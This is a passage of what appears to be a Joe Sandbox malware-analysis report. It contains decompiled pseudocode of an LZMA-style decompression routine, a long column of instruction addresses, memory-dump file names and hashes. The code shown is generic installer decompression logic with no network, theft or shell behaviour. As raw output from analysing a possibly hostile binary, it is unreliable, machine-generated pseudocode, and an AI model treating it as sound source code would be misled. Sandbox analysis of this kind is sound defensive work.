							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                  0x00406a5f
                                  0x00406a66
                                  0x00406a6c
                                  0x00406a72
                                  0x00000000
                                  0x00406a76
                                  0x00406a82
                                  0x00406a82
                                  0x00406a82
                                  0x00406a8b
                                  0x00000000
                                  0x00000000
                                  0x00406a91
                                  0x00000000
                                  0x00406a98
                                  0x00406a9c
                                  0x00000000
                                  0x00000000
                                  0x00406aa5
                                  0x00406aa8
                                  0x00406aab
                                  0x00406aad
                                  0x00406aaf
                                  0x00000000
                                  0x00000000
                                  0x00406ab5
                                  0x00406ab8
                                  0x00406aba
                                  0x00406abb
                                  0x00406abe
                                  0x00406ac0
                                  0x00406ac1
                                  0x00406ac3
                                  0x00406ac6
                                  0x00406acb
                                  0x00406ad0
                                  0x00406ad9
                                  0x00406aec
                                  0x00406aef
                                  0x00406af8
                                  0x00406afb
                                  0x00406b23
                                  0x00406b23
                                  0x00406b25
                                  0x00406b33
                                  0x00406b33
                                  0x00406b37
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406b27
                                  0x00406b27
                                  0x00406b2a
                                  0x00406b2a
                                  0x00406b2b
                                  0x00406b2b
                                  0x00000000
                                  0x00406b27
                                  0x00406afd
                                  0x00406b01
                                  0x00406b06
                                  0x00406b06
                                  0x00406b0f
                                  0x00406b15
                                  0x00406b17
                                  0x00406b1a
                                  0x00000000
                                  0x00406b20
                                  0x00406b20
                                  0x00000000
                                  0x00406b20
                                  0x00000000
                                  0x00406b3d
                                  0x00406b3d
                                  0x00406b41
                                  0x004073ed
                                  0x00000000
                                  0x004073ed
                                  0x00406b4a
                                  0x00406b5a
                                  0x00406b5d
                                  0x00406b60
                                  0x00406b60
                                  0x00406b60
                                  0x00406b63
                                  0x00406b63
                                  0x00406b67
                                  0x00000000
                                  0x00000000
                                  0x00406b69
                                  0x00406b6c
                                  0x00406b6f
                                  0x00406b99
                                  0x00406b9f
                                  0x00406ba6
                                  0x00000000
                                  0x00406ba6
                                  0x00406b71
                                  0x00406b75
                                  0x00406b78
                                  0x00406b7d
                                  0x00406b7d
                                  0x00406b88
                                  0x00406b8e
                                  0x00406b90
                                  0x00406b93
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406bd8
                                  0x00406bde
                                  0x00406be1
                                  0x00406bee
                                  0x00406bf6
                                  0x00000000
                                  0x00000000
                                  0x00406bad
                                  0x00406bad
                                  0x00406bb1
                                  0x004073fc
                                  0x00000000
                                  0x004073fc
                                  0x00406bbd
                                  0x00406bc8
                                  0x00406bc8
                                  0x00406bc8
                                  0x00406bcb
                                  0x00406bce
                                  0x00406bd1
                                  0x00406bd4
                                  0x00406bd6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040726d
                                  0x0040726d
                                  0x00407273
                                  0x00407279
                                  0x0040727c
                                  0x0040727f
                                  0x00407299
                                  0x0040729c
                                  0x004072a2
                                  0x004072ad
                                  0x004072ad
                                  0x004072af
                                  0x00407281
                                  0x00407281
                                  0x00407290
                                  0x00407294
                                  0x00407294
                                  0x004072b2
                                  0x004072b9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004072bb
                                  0x004072bb
                                  0x004072bf
                                  0x0040746e
                                  0x00000000
                                  0x0040746e
                                  0x004072cb
                                  0x004072d2
                                  0x004072da
                                  0x004072da
                                  0x004072da
                                  0x004072dd
                                  0x004072e0
                                  0x004072e0
                                  0x00000000
                                  0x00000000
                                  0x00406bfe
                                  0x00406c00
                                  0x00406c03
                                  0x00406c74
                                  0x00406c77
                                  0x00406c7a
                                  0x00406c81
                                  0x00406c8b
                                  0x00000000
                                  0x00406c8b
                                  0x00406c05
                                  0x00406c09
                                  0x00406c0c
                                  0x00406c0e
                                  0x00406c11
                                  0x00406c14
                                  0x00406c16
                                  0x00406c19
                                  0x00406c1b
                                  0x00406c20
                                  0x00406c23
                                  0x00406c26
                                  0x00406c2a
                                  0x00406c31
                                  0x00406c34
                                  0x00406c3b
                                  0x00406c3f
                                  0x00406c47
                                  0x00406c47
                                  0x00406c47
                                  0x00406c41
                                  0x00406c41
                                  0x00406c41
                                  0x00406c36
                                  0x00406c36
                                  0x00406c36
                                  0x00406c4b
                                  0x00406c4e
                                  0x00406c6c
                                  0x00406c6e
                                  0x00000000
                                  0x00406c6e
                                  0x00406c50
                                  0x00406c53
                                  0x00406c56
                                  0x00406c59
                                  0x00406c5b
                                  0x00406c5b
                                  0x00406c5b
                                  0x00406c5e
                                  0x00406c61
                                  0x00406c63
                                  0x00406c64
                                  0x00406c67
                                  0x00000000
                                  0x00000000
                                  0x00406e9d
                                  0x00406ea1
                                  0x00406ebf
                                  0x00406ec2
                                  0x00406ec9
                                  0x00406ecc
                                  0x00406ecf
                                  0x00406ed2
                                  0x00406ed5
                                  0x00406ed8
                                  0x00406eda
                                  0x00406ee1
                                  0x00406ee2
                                  0x00406ee4
                                  0x00406ee7
                                  0x00406eea
                                  0x00406eed
                                  0x00406eed
                                  0x00406ef2
                                  0x00000000
                                  0x00406ef2
                                  0x00406ea3
                                  0x00406ea6
                                  0x00406ea9
                                  0x00406eb3
                                  0x00000000
                                  0x00000000
                                  0x00406f07
                                  0x00406f0b
                                  0x00406f2e
                                  0x00406f31
                                  0x00406f34
                                  0x00406f3e
                                  0x00406f0d
                                  0x00406f0d
                                  0x00406f10
                                  0x00406f13
                                  0x00406f16
                                  0x00406f23
                                  0x00406f26
                                  0x00406f26
                                  0x00000000
                                  0x00000000
                                  0x00406f4a
                                  0x00406f4e
                                  0x00000000
                                  0x00000000
                                  0x00406f54
                                  0x00406f58
                                  0x00000000
                                  0x00000000
                                  0x00406f5e
                                  0x00406f60
                                  0x00406f64
                                  0x00406f64
                                  0x00406f67
                                  0x00406f6b
                                  0x00000000
                                  0x00000000
                                  0x00406fbb
                                  0x00406fbf
                                  0x00406fc6
                                  0x00406fc9
                                  0x00406fcc
                                  0x00406fd6
                                  0x00000000
                                  0x00406fd6
                                  0x00406fc1
                                  0x00000000
                                  0x00000000
                                  0x00406fe2
                                  0x00406fe6
                                  0x00406fed
                                  0x00406ff0
                                  0x00406ff3
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406ff6
                                  0x00406ff9
                                  0x00406ffc
                                  0x00406ffc
                                  0x00406fff
                                  0x00407002
                                  0x00407005
                                  0x00407005
                                  0x00407008
                                  0x0040700f
                                  0x00407014
                                  0x00000000
                                  0x00000000
                                  0x004070a2
                                  0x004070a2
                                  0x004070a6
                                  0x00407444
                                  0x00000000
                                  0x00407444
                                  0x004070ac
                                  0x004070af
                                  0x004070b2
                                  0x004070b6
                                  0x004070b9
                                  0x004070bf
                                  0x004070c1
                                  0x004070c1
                                  0x004070c1
                                  0x004070c4
                                  0x004070c7
                                  0x00000000
                                  0x00000000
                                  0x00406c97
                                  0x00406c97
                                  0x00406c9b
                                  0x00407408
                                  0x00000000
                                  0x00407408
                                  0x00406ca1
                                  0x00406ca4
                                  0x00406ca7
                                  0x00406cab
                                  0x00406cae
                                  0x00406cb4
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb9
                                  0x00406cbc
                                  0x00406cbc
                                  0x00406cbf
                                  0x00406cc2
                                  0x00000000
                                  0x00000000
                                  0x00406cc8
                                  0x00406cce
                                  0x00000000
                                  0x00000000
                                  0x00406cd4
                                  0x00406cd4
                                  0x00406cd8
                                  0x00406cdb
                                  0x00406cde
                                  0x00406ce1
                                  0x00406ce4
                                  0x00406ce5
                                  0x00406ce8
                                  0x00406cea
                                  0x00406cf0
                                  0x00406cf3
                                  0x00406cf6
                                  0x00406cf9
                                  0x00406cfc
                                  0x00406cff
                                  0x00406d02
                                  0x00406d1e
                                  0x00406d21
                                  0x00406d24
                                  0x00406d27
                                  0x00406d2e
                                  0x00406d32
                                  0x00406d34
                                  0x00406d38
                                  0x00406d04
                                  0x00406d04
                                  0x00406d08
                                  0x00406d10
                                  0x00406d15
                                  0x00406d17
                                  0x00406d19
                                  0x00406d19
                                  0x00406d3b
                                  0x00406d42
                                  0x00406d45
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d50
                                  0x00406d50
                                  0x00406d54
                                  0x00407414
                                  0x00000000
                                  0x00407414
                                  0x00406d5a
                                  0x00406d5d
                                  0x00406d60
                                  0x00406d64
                                  0x00406d67
                                  0x00406d6d
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d72
                                  0x00406d75
                                  0x00406d75
                                  0x00406d75
                                  0x00406d7b
                                  0x00000000
                                  0x00000000
                                  0x00406d7d
                                  0x00406d80
                                  0x00406d83
                                  0x00406d86
                                  0x00406d89
                                  0x00406d8c
                                  0x00406d8f
                                  0x00406d92
                                  0x00406d95
                                  0x00406d98
                                  0x00406d9b
                                  0x00406db3
                                  0x00406db6
                                  0x00406db9
                                  0x00406dbc
                                  0x00406dbc
                                  0x00406dbf
                                  0x00406dc3
                                  0x00406dc5
                                  0x00406d9d
                                  0x00406d9d
                                  0x00406da5
                                  0x00406daa
                                  0x00406dac
                                  0x00406dae
                                  0x00406dae
                                  0x00406dc8
                                  0x00406dcf
                                  0x00406dd2
                                  0x00000000
                                  0x00406dd4
                                  0x00000000
                                  0x00406dd4
                                  0x00406dd2
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00000000
                                  0x00000000
                                  0x00406e14
                                  0x00406e14
                                  0x00406e18
                                  0x00407420
                                  0x00000000
                                  0x00407420
                                  0x00406e1e
                                  0x00406e21
                                  0x00406e24
                                  0x00406e28
                                  0x00406e2b
                                  0x00406e31
                                  0x00406e33
                                  0x00406e33
                                  0x00406e33
                                  0x00406e36
                                  0x00406e39
                                  0x00406e39
                                  0x00406e3f
                                  0x00406ddd
                                  0x00406ddd
                                  0x00406de0
                                  0x00000000
                                  0x00406de0
                                  0x00406e41
                                  0x00406e41
                                  0x00406e44
                                  0x00406e47
                                  0x00406e4a
                                  0x00406e4d
                                  0x00406e50
                                  0x00406e53
                                  0x00406e56
                                  0x00406e59
                                  0x00406e5c
                                  0x00406e5f
                                  0x00406e77
                                  0x00406e7a
                                  0x00406e7d
                                  0x00406e80
                                  0x00406e80
                                  0x00406e83
                                  0x00406e87
                                  0x00406e89
                                  0x00406e61
                                  0x00406e61
                                  0x00406e69
                                  0x00406e6e
                                  0x00406e70
                                  0x00406e72
                                  0x00406e72
                                  0x00406e8c
                                  0x00406e93
                                  0x00406e96
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00407125
                                  0x00407125
                                  0x00407129
                                  0x00407450
                                  0x00000000
                                  0x00407450
                                  0x0040712f
                                  0x00407132
                                  0x00407135
                                  0x00407139
                                  0x0040713c
                                  0x00407142
                                  0x00407144
                                  0x00407144
                                  0x00407144
                                  0x00407147
                                  0x00000000
                                  0x00000000
                                  0x00406ef5
                                  0x00406ef5
                                  0x00406ef8
                                  0x00000000
                                  0x00000000
                                  0x00407234
                                  0x00407238
                                  0x0040725a
                                  0x0040725d
                                  0x00407267
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x0040723a
                                  0x0040723d
                                  0x00407241
                                  0x00407244
                                  0x00407244
                                  0x00407247
                                  0x00000000
                                  0x00000000
                                  0x004072f1
                                  0x004072f5
                                  0x00407313
                                  0x00407313
                                  0x00407313
                                  0x0040731a
                                  0x00407321
                                  0x00407328
                                  0x00407328
                                  0x00000000
                                  0x00407328
                                  0x004072f7
                                  0x004072fa
                                  0x004072fd
                                  0x00407300
                                  0x00407307
                                  0x0040724b
                                  0x0040724b
                                  0x0040724e
                                  0x00000000
                                  0x00000000
                                  0x004073e2
                                  0x004073e5
                                  0x00000000
                                  0x00000000
                                  0x0040701c
                                  0x0040701e
                                  0x00407025
                                  0x00407026
                                  0x00407028
                                  0x0040702b
                                  0x00000000
                                  0x00000000
                                  0x00407033
                                  0x00407036
                                  0x00407039
                                  0x0040703b
                                  0x0040703d
                                  0x0040703d
                                  0x0040703e
                                  0x00407041
                                  0x00407048
                                  0x0040704b
                                  0x00407059
                                  0x00000000
                                  0x00000000
                                  0x0040732f
                                  0x0040732f
                                  0x00407332
                                  0x00407339
                                  0x00000000
                                  0x00000000
                                  0x0040733e
                                  0x0040733e
                                  0x00407342
                                  0x0040747a
                                  0x00000000
                                  0x0040747a
                                  0x00407348
                                  0x0040734b
                                  0x0040734e
                                  0x00407352
                                  0x00407355
                                  0x0040735b
                                  0x0040735d
                                  0x0040735d
                                  0x0040735d
                                  0x00407360
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407366
                                  0x00407366
                                  0x0040736a
                                  0x004073ca
                                  0x004073cd
                                  0x004073d2
                                  0x004073d3
                                  0x004073d5
                                  0x004073d7
                                  0x004073da
                                  0x004072e6
                                  0x004072e6
                                  0x00000000
                                  0x004072e6
                                  0x0040736c
                                  0x00407372
                                  0x00407375
                                  0x00407378
                                  0x0040737b
                                  0x0040737e
                                  0x00407381
                                  0x00407384
                                  0x00407387
                                  0x0040738a
                                  0x0040738d
                                  0x004073a6
                                  0x004073a9
                                  0x004073ac
                                  0x004073af
                                  0x004073b3
                                  0x004073b5
                                  0x004073b5
                                  0x004073b6
                                  0x004073b9
                                  0x0040738f
                                  0x0040738f
                                  0x00407397
                                  0x0040739c
                                  0x0040739e
                                  0x004073a1
                                  0x004073a1
                                  0x004073bc
                                  0x004073c3
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x00407061
                                  0x00407064
                                  0x0040709a
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071cd
                                  0x004071cd
                                  0x004071d0
                                  0x004071d2
                                  0x0040745c
                                  0x00000000
                                  0x0040745c
                                  0x004071d8
                                  0x004071db
                                  0x00000000
                                  0x00000000
                                  0x004071e1
                                  0x004071e5
                                  0x004071e8
                                  0x004071e8
                                  0x004071e8
                                  0x00000000
                                  0x004071e8
                                  0x00407066
                                  0x00407068
                                  0x0040706a
                                  0x0040706c
                                  0x0040706f
                                  0x00407070
                                  0x00407072
                                  0x00407074
                                  0x00407077
                                  0x0040707a
                                  0x00407090
                                  0x00407095
                                  0x004070cd
                                  0x004070cd
                                  0x004070d1
                                  0x004070fd
                                  0x004070ff
                                  0x00407106
                                  0x00407109
                                  0x0040710c
                                  0x0040710c
                                  0x00407111
                                  0x00407111
                                  0x00407113
                                  0x00407116
                                  0x0040711d
                                  0x00407120
                                  0x0040714d
                                  0x0040714d
                                  0x00407150
                                  0x00407153
                                  0x004071c7
                                  0x004071c7
                                  0x004071c7
                                  0x00000000
                                  0x004071c7
                                  0x00407155
                                  0x0040715b
                                  0x0040715e
                                  0x00407161
                                  0x00407164
                                  0x00407167
                                  0x0040716a
                                  0x0040716d
                                  0x00407170
                                  0x00407173
                                  0x00407176
                                  0x0040718f
                                  0x00407191
                                  0x00407194
                                  0x00407195
                                  0x00407198
                                  0x0040719a
                                  0x0040719d
                                  0x0040719f
                                  0x004071a1
                                  0x004071a4
                                  0x004071a6
                                  0x004071a9
                                  0x004071ad
                                  0x004071af
                                  0x004071af
                                  0x004071b0
                                  0x004071b3
                                  0x004071b6
                                  0x00407178
                                  0x00407178
                                  0x00407180
                                  0x00407185
                                  0x00407187
                                  0x0040718a
                                  0x0040718a
                                  0x004071b9
                                  0x004071c0
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x00000000
                                  0x004071c2
                                  0x00000000
                                  0x004071c2
                                  0x004071c0
                                  0x004070d3
                                  0x004070d6
                                  0x004070d8
                                  0x004070db
                                  0x004070de
                                  0x004070e1
                                  0x004070e3
                                  0x004070e6
                                  0x004070e9
                                  0x004070e9
                                  0x004070ec
                                  0x004070ec
                                  0x004070ef
                                  0x004070f6
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x00000000
                                  0x004070f8
                                  0x00000000
                                  0x004070f8
                                  0x004070f6
                                  0x0040707c
                                  0x0040707f
                                  0x00407081
                                  0x00407084
                                  0x00000000
                                  0x00000000
                                  0x00406de3
                                  0x00406de3
                                  0x00406de7
                                  0x0040742c
                                  0x00000000
                                  0x0040742c
                                  0x00406ded
                                  0x00406df0
                                  0x00406df3
                                  0x00406df6
                                  0x00406df9
                                  0x00406dfc
                                  0x00406dff
                                  0x00406e01
                                  0x00406e04
                                  0x00406e07
                                  0x00406e0a
                                  0x00406e0c
                                  0x00406e0c
                                  0x00406e0c
                                  0x00000000
                                  0x00000000
                                  0x00406f6e
                                  0x00406f6e
                                  0x00406f72
                                  0x00407438
                                  0x00000000
                                  0x00407438
                                  0x00406f78
                                  0x00406f7b
                                  0x00406f7e
                                  0x00406f81
                                  0x00406f83
                                  0x00406f83
                                  0x00406f83
                                  0x00406f86
                                  0x00406f89
                                  0x00406f8c
                                  0x00406f8f
                                  0x00406f92
                                  0x00406f95
                                  0x00406f96
                                  0x00406f98
                                  0x00406f98
                                  0x00406f98
                                  0x00406f9b
                                  0x00406f9e
                                  0x00406fa1
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa7
                                  0x00406fa9
                                  0x00406fa9
                                  0x00000000
                                  0x00000000
                                  0x004071eb
                                  0x004071eb
                                  0x004071eb
                                  0x004071ef
                                  0x00000000
                                  0x00000000
                                  0x004071f5
                                  0x004071f8
                                  0x004071fb
                                  0x004071fe
                                  0x00407200
                                  0x00407200
                                  0x00407200
                                  0x00407203
                                  0x00407206
                                  0x00407209
                                  0x0040720c
                                  0x0040720f
                                  0x00407212
                                  0x00407213
                                  0x00407215
                                  0x00407215
                                  0x00407215
                                  0x00407218
                                  0x0040721b
                                  0x0040721e
                                  0x00407221
                                  0x00407224
                                  0x00407228
                                  0x0040722a
                                  0x0040722d
                                  0x00000000
                                  0x0040722f
                                  0x00406fac
                                  0x00406fac
                                  0x00000000
                                  0x00406fac
                                  0x0040722d
                                  0x00407462
                                  0x00407484
                                  0x0040748a
                                  0x0040748c
                                  0x00407493
                                  0x00000000
                                  0x00000000
                                  0x00406a91
                                  0x00407499
                                  0x00407499
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                                  • Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
                                  • Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                                  • Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406E9D Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E00406E9D() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
